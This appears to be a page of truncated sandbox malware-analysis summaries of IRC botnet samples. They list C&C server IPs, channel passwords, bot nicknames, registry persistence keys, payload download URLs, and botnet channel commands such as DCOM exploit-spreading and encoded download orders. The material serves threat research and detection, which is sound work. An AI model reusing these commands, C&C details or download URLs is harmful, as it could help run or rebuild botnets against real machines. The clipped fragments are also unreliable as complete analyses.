Author: Pig

Remote Host Port Number 174.37.200.82 80 63.135.80.224 80 63.135.80.46 80 64.208.241.27 80 66.220.149.25 80 64.202.107.109 1234 PASS xxx JOIN #!nn! test MODE NEW-[USA|00|P|82252] -ix PONG 22 MOTD NICK NEW-[USA|00|P|82252] USER XP-0038 * 0 :COMPUTERNAME * The data identified by the following URLs was then requested from the remote web server: o http://174.37.200.82/index.php o http://browseusers.myspace.com/Browse/Browse.aspx oRead more...

Resolved : [leaf.15781.com] To [174.137.125.78] Remote Host Port Number 173.163.15.116 9595 PASS prison 204.13.248.70 80 72.233.89.199 80 NICK {00-USA-XP-COMP-7851} PONG leaf.15781.com NICK {iNF-00-USA-XP-COMP-3925} USER MEAT * 0 :COMP JOIN ###mini Now talking in ###mini Topic By: [ pe[ro ] Modes On: [ ###mini ] [ +smntu ] Now talking in ###USA Topic On: [ ###USARead more...

DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.9.2 nice.niceshot.in 207.210.96.152 C&C Server: 207.210.96.152:6567 Server Password: Username: XP-9009 Nickname: [SI|DEU|00|P|70534] Channel: #cuchi# (Password: c1rc0dus0leil) Channeltopic: C&C Server: 207.210.96.152:6567 Server Password: Username: XP-4274 Nickname: [SI|DEU|00|P|34816] Channel: #cuchi# (Password: c1rc0dus0leil) Channeltopic: Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Service ares” = conmysys.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRunRead more...

Remote Host Port Number 209.236.69.47 81 NOTICE IRC : V3RS10N 15D3v1Lz Sp 14yB0t M0d3d A nd C0d3d By 14sNo0p_Do0g For 15D3v1Lz T34m PRIVMSG #spy : winhostmanager.net P: 22 D: 150 T:1500. L3ts Th3 D3v1Lz W0rk! T1ll H3 G3t D1sc0nn3ct3d. JOIN #Spy Spy MODE UserName85 +i MODE #spy +ntusMm x1x4x0.net P: 5500 D: 150 T:1500. L3tsRead more...

DNS Lookup Host Name IP Address img1.alyoy.in 70.39.100.4 70.39.100.4 70.39.100.4 0 127.0.0.1 UDP Connections Remote IP Address: 127.0.0.1 Port: 1037 Send Datagram: 113 packet(s) of size 1 Recv Datagram: 113 packet(s) of size 1 Download URLs http://70.39.100.4/img/img.txt (img1.alyoy.in) http://70.39.100.4/img/YdtaOeu0lfMm1.exe (img1.alyoy.in) Outgoing connection to remote server: img1.alyoy.in TCP port 61688 Outgoing connection to remote server: img1.alyoy.inRead more...

Remote Host Port Number 69.14.212.123 65267 PASS daloot JOIN #NzM# screwu USERHOST USA|00|XP|SP2|3342046 MODE USA|00|XP|SP2|3342046 -x+i PRIVMSG #NzM# : (patcher.p fixed, version 1. NICK USA|00|XP|SP2|3342046 USER pnlzszqe 0 0 :USA|00|XP|SP2|3342046 PONG :A2E3B7DC Now talking in #NzM# Topic On: [ #NzM# ] [ .root.start dcom135 200 0 0 109.x.x.x -a -b -r -s ] Topic By:Read more...

DNS Lookup Host Name IP Address beautybiz.no-ip.org 84.19.169.234 Outgoing connection to remote server: beautybiz.no-ip.org TCP port 80DNS Lookup Host Name IP Address 127.0.0.1 127.0.0.1 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “UserInit” = C:WINDOWSsystem32userinit.exe,C:Windupdtwinupdate.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “winupdater” = C:Windupdtwinupdate.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem “DisableRegistryTools” = [REG_DWORD, value: 00000001] HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile “EnableFirewall” = [REG_DWORD, value: 00000001] HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileRead more...

Resolved : [ush.nerashti.net] To [109.123.108.61] Resolved : [ush.nerashti.net] To [174.127.127.137] Resolved : [ush.nerashti.net] To [77.68.52.6] DNS Lookup Host Name IP Address ush.nerashti.net 77.68.52.6 C&C Server: 77.68.52.6:81 Server Password: Username: n Nickname: n|DEU|XP|DELL-D3E62F7E26|mmxwpcz Channel: #win# (Password: ) Channeltopic: :.im /99/106/112/81/55/59/40/125/111/122/35/104/108/44/39/100/113/109/110/59/106/120/102/9/83/106/112/124/99/123/124/36/112/107/113/31/60/117/96/71/109/105/110/103/107/112/46/57/37/59/38/42/23/8/65/72/83/ Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “C:Dokumente und EinstellungenAdministratorAnwendungsdatenS-3685-5437-5687winsrvn.exe” = C:Dokumente undRead more...

Remote Host Port Number 174.127.127.137 81 NICK n[USA|XP|COMPUTERNAME]xvfnrcj USER n “” “lol” :n JOIN #bul# PONG 422 PONG :request4.not.found Now talking in #bul# Topic On: [ #bul# ] [ 13 .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/ ] Topic By: [ n ] (abc) .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/ (RDP) .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/ Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]Read more...

Remote Host Port Number 137.215.75.246 6667 195.197.175.21 6667 NICK drugss ISON akon black bleed blood dead devil dr evil ghost hustler lord Lucifer mad ManaGer Master mIRC Mr Power sadness Scorpions system JOIN #Raps MODE #raps MODE mwahc +iwx MODE drugss +iwx SILENCE +*!*@* USER net “” “rap-yo-city.dyndns.org” : 6Get away ! NICK samerl USERRead more...